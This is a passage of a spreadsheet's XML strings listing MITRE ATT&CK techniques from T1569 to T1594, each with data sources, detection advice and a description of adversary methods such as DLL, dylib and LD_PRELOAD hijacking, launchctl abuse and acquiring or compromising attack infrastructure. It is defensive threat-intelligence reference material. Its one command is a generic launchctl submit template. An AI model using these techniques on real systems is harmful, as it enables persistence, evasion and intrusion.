By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)
Running a command from launchctl is as simple as &lt;code&gt;launchctl submit -l &lt;labelName&gt; -- /Path/to/thing/to/execute "arg" "arg" "arg"&lt;/code&gt;. Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>Changes to service Registry entries and command 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</si>
  <si>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</si>
  <si>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T1570</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 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t>
  </si>
  <si>
    <t>Adversaries may communicate using a protocol and port paring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t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.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</si>
  <si>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</si>
  <si>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T1573</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)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</si>
  <si>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</si>
  <si>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T1573.001</t>
  </si>
  <si>
    <t>Symmetric Cryptography</t>
  </si>
  <si>
    <t>With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.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</si>
  <si>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</si>
  <si>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T1573.002</t>
  </si>
  <si>
    <t>Asymmetric Cryptography</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</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</si>
  <si>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may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>T1574</t>
  </si>
  <si>
    <t>Hijack Execution Flow</t>
  </si>
  <si>
    <t>Environment variable,Loaded DLLs,Process command-line parameters,Process monitoring,File monitoring,DLL monitoring</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</si>
  <si>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Monitor for changes to environment variables, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
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Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.</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</si>
  <si>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t>
  </si>
  <si>
    <t>persistence,privilege-escalation,defense-evasion</t>
  </si>
  <si>
    <t>T1574.001</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,DLL monitoring,File monitoring</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</si>
  <si>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</si>
  <si>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Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)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(Citation: Microsoft Security Advisory 2269637)
Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: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</si>
  <si>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T1574.002</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Process use of network</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</si>
  <si>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</si>
  <si>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Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: About Side by Side Assemblies) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one.  (Citation: FireEye DLL Side-Loading)
Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</t>
  </si>
  <si>
    <t>T1574.004</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">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 </t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking ambiguous paths  used to load libraries. Adversaries may plant trojan dynamic libraries, in a directory that will be searched by the operating system before the legitimate library specified by the victim program, so that their malicious library will be loaded into the victim program instead.  MacOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths.
A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)
If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level.</t>
  </si>
  <si>
    <t>T1574.005</t>
  </si>
  <si>
    <t>Executable Installer File Permissions Weakness</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1574.006</t>
  </si>
  <si>
    <t>LD_PRELOAD</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,Environment variable</t>
  </si>
  <si>
    <t>Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)
Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or &lt;code&gt;/etc/ld.so.preload&lt;/code&gt; file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by &lt;code&gt;dlopen()&lt;/code&gt; and &lt;code&gt;mmap()&lt;/code&gt; respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.</t>
  </si>
  <si>
    <t>T1574.007</t>
  </si>
  <si>
    <t>Path Interception by PATH Environment Variable</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</si>
  <si>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</si>
  <si>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Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.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t>
  </si>
  <si>
    <t>T1574.008</t>
  </si>
  <si>
    <t>Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">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
</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1574.009</t>
  </si>
  <si>
    <t>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1574.010</t>
  </si>
  <si>
    <t>Services File Permissions Weakness</t>
  </si>
  <si>
    <t>Process command-line parameters,Services,File monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">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 </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</si>
  <si>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</si>
  <si>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T1574.011</t>
  </si>
  <si>
    <t>Services Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Windows Registry,Services,Process command-line parameters</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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.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permissions. (Citation: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&lt;code&gt;FailureCommand&lt;/code&gt;) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) </t>
  </si>
  <si>
    <t>T1574.012</t>
  </si>
  <si>
    <t>COR_PROFILER</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.</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</si>
  <si>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profiliers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</si>
  <si>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T1578</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</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</si>
  <si>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</si>
  <si>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T1578.001</t>
  </si>
  <si>
    <t>Create Snapshot</t>
  </si>
  <si>
    <t>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the &lt;code&gt;gcloud compute instances create&lt;/code&gt; command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the &lt;code&gt;"sourceSnapshot":&lt;/code&gt; parameter pointed to &lt;code&gt;"global/snapshots/[BOOT_SNAPSHOT_NAME]&lt;/code&gt;.(Citation: GCP - Creating and Starting a VM)</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</si>
  <si>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Instance](https://attack.mitre.org/techniques/T1536)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</si>
  <si>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T1578.002</t>
  </si>
  <si>
    <t>Create Cloud Instance</t>
  </si>
  <si>
    <t>The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the &lt;code&gt;RunInstances&lt;/code&gt; event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances create&lt;/code&gt; to create a VM.(Citation: Cloud Audit Logs)</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</si>
  <si>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</si>
  <si>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T1578.003</t>
  </si>
  <si>
    <t>Delete Cloud Instance</t>
  </si>
  <si>
    <t>The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the &lt;code&gt;TerminateInstances&lt;/code&gt; event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances delete&lt;/code&gt; to delete a VM.(Citation: Cloud Audit Logs)</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</si>
  <si>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</si>
  <si>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T1578.004</t>
  </si>
  <si>
    <t>Revert Cloud Instance</t>
  </si>
  <si>
    <t>Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</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</si>
  <si>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</si>
  <si>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T1580</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery</t>
  </si>
  <si>
    <t>GCP audit logs,Stackdriver logs,AWS CloudTrail logs,Azure activity logs</t>
  </si>
  <si>
    <t>AWS,Azure,GCP</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>An adversary may attempt to discover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as well as the &lt;code&gt;ListBuckets&lt;/code&gt; API that returns a list of all buckets owned by the authenticated sender of the request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) Similarly, GCP's Cloud SDK CLI provides the &lt;code&gt;gcloud compute instances list&lt;/code&gt; command to list all Google Compute Engine instances in a project(Citation: Google Compute Instances), and Azure's CLI command &lt;code&gt;az vm list&lt;/code&gt; lists details of virtual machines.(Citation: Microsoft AZ CLI)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 Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>PRE</t>
  </si>
  <si>
    <t>Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Much of this activity may take place outside the visibility of the target organization, making detection of this behavior difficult.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Before compromising a victim, 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an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.</t>
  </si>
  <si>
    <t>resource-development</t>
  </si>
  <si>
    <t>T1583.001</t>
  </si>
  <si>
    <t>Domains</t>
  </si>
  <si>
    <t>Domain registration</t>
  </si>
  <si>
    <t>Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries can use purchased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can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)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</si>
  <si>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T1583.002</t>
  </si>
  <si>
    <t>DNS Server</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1583.003</t>
  </si>
  <si>
    <t>Virtual Private Server</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1583.004</t>
  </si>
  <si>
    <t>Server</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.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</si>
  <si>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T1583.005</t>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).</t>
  </si>
  <si>
    <t>Before compromising a victim, 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booter/stressor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</si>
  <si>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T1583.006</t>
  </si>
  <si>
    <t>Web Services</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).</t>
  </si>
  <si>
    <t>Before compromising a victim, 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or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web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an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)</t>
  </si>
  <si>
    <t>T1584.001</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary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t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>Before compromising a victim, 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Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)</t>
  </si>
  <si>
    <t>T1584.003</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1584.004</t>
  </si>
  <si>
    <t>Before compromising a victim, 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t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>Before compromising a victim, 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booter/stressor service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems.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</si>
  <si>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T1584.006</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google,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or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: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t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>Social media monitoring</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified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</si>
  <si>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Before compromising a victim, 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</si>
  <si>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T1585.001</t>
  </si>
  <si>
    <t>Social Media Accounts</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified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</si>
  <si>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Before compromising a victim, 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</si>
  <si>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T1585.002</t>
  </si>
  <si>
    <t>Email Accounts</t>
  </si>
  <si>
    <t>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</si>
  <si>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Before compromising a victim, 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</si>
  <si>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T1586</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently 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</si>
  <si>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Before compromising a victim, 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or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary)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</si>
  <si>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T1586.001</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently 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</si>
  <si>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Before compromising a victim, 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</si>
  <si>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T1586.002</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship,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or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Adversaries can use a compromised email account to hijack existing email threads with targets of interest.</t>
  </si>
  <si>
    <t>T1587</t>
  </si>
  <si>
    <t>Develop Capabilities</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1587.001</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors,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</si>
  <si>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T1587.002</t>
  </si>
  <si>
    <t>Code Signing Certificates</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1587.003</t>
  </si>
  <si>
    <t>Digital Certificates</t>
  </si>
  <si>
    <t>SSL/TLS certificates</t>
  </si>
  <si>
    <t>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[Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Before compromising a victim, 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[Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).</t>
  </si>
  <si>
    <t>T1587.004</t>
  </si>
  <si>
    <t>Exploits</t>
  </si>
  <si>
    <t>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</si>
  <si>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Before compromising a victim, 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</si>
  <si>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t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1588.001</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1588.002</t>
  </si>
  <si>
    <t>Tool</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1588.003</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1588.004</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Before compromising a victim, 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[Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557)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Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)
Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.</t>
  </si>
  <si>
    <t>T1588.005</t>
  </si>
  <si>
    <t xml:space="preserve">
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</si>
  <si>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Before compromising a victim, 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</si>
  <si>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T1588.006</t>
  </si>
  <si>
    <t>Vulnerabilities</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities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</si>
  <si>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Before compromising a victim, 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</si>
  <si>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T1589</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>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</si>
  <si>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Before compromising a victim, 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</si>
  <si>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reconnaissance</t>
  </si>
  <si>
    <t>T1589.001</t>
  </si>
  <si>
    <t>Credentials</t>
  </si>
  <si>
    <t>Before compromising a victim, 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include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t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Email Addresses</t>
  </si>
  <si>
    <t>Before compromising a victim, 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t>
  </si>
  <si>
    <t>T1589.003</t>
  </si>
  <si>
    <t>Employee Names</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1590</t>
  </si>
  <si>
    <t>Gather Victim Network Information</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1590.001</t>
  </si>
  <si>
    <t>Domain Properties</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1590.002</t>
  </si>
  <si>
    <t>Before compromising a victim, adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.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</si>
  <si>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T1590.003</t>
  </si>
  <si>
    <t>Network Trust Dependencies</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1590.004</t>
  </si>
  <si>
    <t>Network Topology</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1590.005</t>
  </si>
  <si>
    <t>IP Addresses</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1590.006</t>
  </si>
  <si>
    <t>Network Security Appliances</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1591</t>
  </si>
  <si>
    <t>Gather Victim Org Information</t>
  </si>
  <si>
    <t>Before compromising a victim, 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DOB Business Lookup)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</si>
  <si>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T1591.001</t>
  </si>
  <si>
    <t>Determine Physical Locations</t>
  </si>
  <si>
    <t>Before compromising a victim, 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DOB Business Lookup)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</si>
  <si>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T1591.002</t>
  </si>
  <si>
    <t>Business Relationships</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1591.003</t>
  </si>
  <si>
    <t>Identify Business Tempo</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1591.004</t>
  </si>
  <si>
    <t>Identify Roles</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1592</t>
  </si>
  <si>
    <t>Gather Victim Host Information</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1592.001</t>
  </si>
  <si>
    <t>Hardware</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1592.002</t>
  </si>
  <si>
    <t>Software</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1592.003</t>
  </si>
  <si>
    <t>Firmware</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1592.004</t>
  </si>
  <si>
    <t>Client Configurations</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1593</t>
  </si>
  <si>
    <t>Search Open Websites/Domains</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1593.001</t>
  </si>
  <si>
    <t>Social Media</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1593.002</t>
  </si>
  <si>
    <t>Search Engines</t>
  </si>
  <si>
    <t>Before compromising a victim, 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</si>
  <si>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T1594</t>
  </si>
